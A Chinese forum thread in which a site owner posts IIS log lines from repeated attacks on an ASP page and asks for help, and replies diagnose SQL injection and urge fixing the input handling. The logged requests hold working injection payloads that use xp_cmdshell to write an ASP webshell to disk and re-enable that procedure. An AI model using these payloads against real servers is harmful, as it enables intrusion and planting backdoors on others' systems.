我的服务器一直被黑，请求大侠帮忙，下面是IIS里面的一段log

vikingwo

2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20objFSO%20%25^>%20>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能，请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20fdata%20%25^>%20>>f:\xxxxiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能，请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20dim%20objCountFile%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能，请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20on%20error%20resume%20next%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能，请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx  GET /view.asp id=1777;EXEc%20MaStER..Xp_CmdShell%20'EcHo%20^<%25%20Set%20objFSO%20=%20Server.CreateObject(^"Scripting.FileSystemObject^")%20%25^>%20>>f:\xxx\xiao.asp';exec%20master..sp_dropextendedproc%20'xp_cmdshell'-- 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 200 0 64
2007-05-08 14:29:47 W3SVC597409326 xxx.xxx.xxx GET /view.asp id=1777;use%20master%20dbcc%20addextendedproc('xp_cmdshell','xplog70.dll')--|142|80040e21|多步_OLE_DB_操作产生错误。如果可能，请检查每个_OLE_DB_状态值。没有工作被完成。 80 - 125.124.130.199 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0) 500 0 64


请大家帮我看一下，问题出在哪里 谢谢了！！！！

HonestQiao

显而易见，是你的asp程序没有对输入的变量进行过滤或者安全处理，就直接入库查询导致的。

你需要修改一下你的asp程序。

Kagilo

被注入了。

stormgenius

赶快把该补的地方好好修补一下